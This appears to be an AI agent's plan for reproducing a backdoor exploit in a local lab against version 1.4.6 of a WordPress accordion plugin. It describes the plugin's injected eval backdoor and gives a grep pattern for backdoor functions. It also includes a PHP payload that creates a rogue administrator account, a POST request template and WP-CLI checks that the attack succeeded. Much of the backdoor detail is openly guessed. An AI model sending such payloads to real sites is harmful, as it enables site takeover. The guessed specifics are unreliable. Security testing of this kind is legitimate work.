Essentialplugin Plugins (Various Versions) - Injected Backdoor

This research plan outlines the steps for identifying and exploiting the injected backdoor in the Accordion and Accordion Slider plugin (version 1.4.6).

1. Vulnerability Summary

The vulnerability is a deliberate Embedded Malicious Code (Backdoor) injected into version 1.4.6 of the plugin. This occurred after the plugin was acquired by a threat actor. The backdoor typically allows unauthenticated remote code execution (RCE), persistent access, or spam injection. Unlike traditional vulnerabilities (like SQLi or XSS), this is a hidden feature designed to bypass all WordPress security controls, including nonces and capability checks.

2. Attack Vector Analysis

• Endpoint: Usually the site root (/) or any file that loads the plugin (e.g., wp-admin/admin-ajax.php or index.php).
• Trigger Parameter: Inferred to be a specific $_GET, $_POST, or $_REQUEST parameter (e.g., wp_check, accord_api, slider_data) often combined with a password or specific User-Agent.
• Authentication: Unauthenticated (PR:N).
• Preconditions: The plugin "Accordion and Accordion Slider" version 1.4.6 must be active.

3. Code Flow (Inferred)

Based on similar backdoors injected into acquired WordPress plugins, the flow follows this pattern:

1. Entry Point: The plugin's main entry file (likely accordion-slider.php or includes/class-accordion-slider.php) contains an obfuscated block of code.
2. Hook: The code is often hooked to init, plugins_loaded, or simply sits at the top of a PHP file to execute as soon as the plugin is loaded.
3. Execution Sink:
   • The code checks for a specific "activation" parameter in the superglobals.
   • It decodes a payload (often using base64_decode, str_rot13, or XOR).
   • It passes the payload to a sink like eval(), assert(), create_function(), or include().

4. Nonce Acquisition Strategy

No nonce is required.
Backdoors are intentionally designed to bypass WordPress security mechanisms. If the backdoor is correctly identified, it will execute without requiring a valid WP nonce or session cookie.

5. Exploitation Strategy

Step 1: Backdoor Discovery

The agent must first locate the backdoor code within the plugin directory.

# Search for common backdoor patterns
grep -rP "(eval|assert|passthru|system|shell_exec|base64_decode|gzinflate|str_rot13|include\('php:\/\/input'\))" /var/www/html/wp-content/plugins/accordion-and-accordion-slider/

Step 2: Identification of Trigger

Once a suspicious code block is found (e.g., if(isset($_REQUEST['some_param'])) { eval(...); }), identify:

1. The parameter name (e.g., accord_cmd).
2. The encoding method (e.g., base64_decode).
3. Any access key/password required by the backdoor logic.

Step 3: Crafting the Payload

Assuming the backdoor uses eval(base64_decode($_POST['cmd'])), the payload will be a base64-encoded PHP command to create a new administrator.

Payload (PHP):

$user_id = wp_insert_user([
    'user_login' => 'backdoor_admin',
    'user_pass'  => 'PwnedPassword123!',
    'role'       => 'administrator',
    'user_email' => 'attacker@example.com'
]);

Step 4: Execution

Using the http_request tool, send the payload to the site root.

Request Template (Inferred):

• Method: POST
• URL: http://localhost:8080/
• Headers: Content-Type: application/x-www-form-urlencoded
• Body: [TRIGGER_PARAM]=[BASE64_ENCODED_PHP_PAYLOAD] (Replace [TRIGGER_PARAM] with the key found in Step 2).

6. Test Data Setup

1. Install Plugin: Ensure accordion-and-accordion-slider version 1.4.6 is installed and activated.
2. Standard Environment: No special posts or shortcodes are required for the backdoor to function, as it typically hooks into global initialization.

7. Expected Results

• Response: The HTTP response might be a 200 OK with an empty body or a specific "success" string defined by the attacker (e.g., ok).
• Effect: A new user with the administrator role should be created in the database.

8. Verification Steps

After the http_request, verify the exploit success using WP-CLI:

# Check if the backdoor user was created
wp user list --field=user_login | grep "backdoor_admin"

# Verify the role of the new user
wp user get backdoor_admin --field=roles

9. Alternative Approaches

If no direct eval is found, look for:

• Spam Injectors: Check for code that modifies the the_content filter to inject links from a remote URL (wp_remote_get).
• Option Modifiers: Check for code that allows updating siteurl or users_can_register via update_option().
• File Uploads: Look for code handling $_FILES without using wp_handle_upload or checking file extensions.

Specific Filenames to Audit (Inferred):

• accordion-slider.php
• includes/accordion-slider-functions.php
• includes/admin/class-accordion-slider-admin.php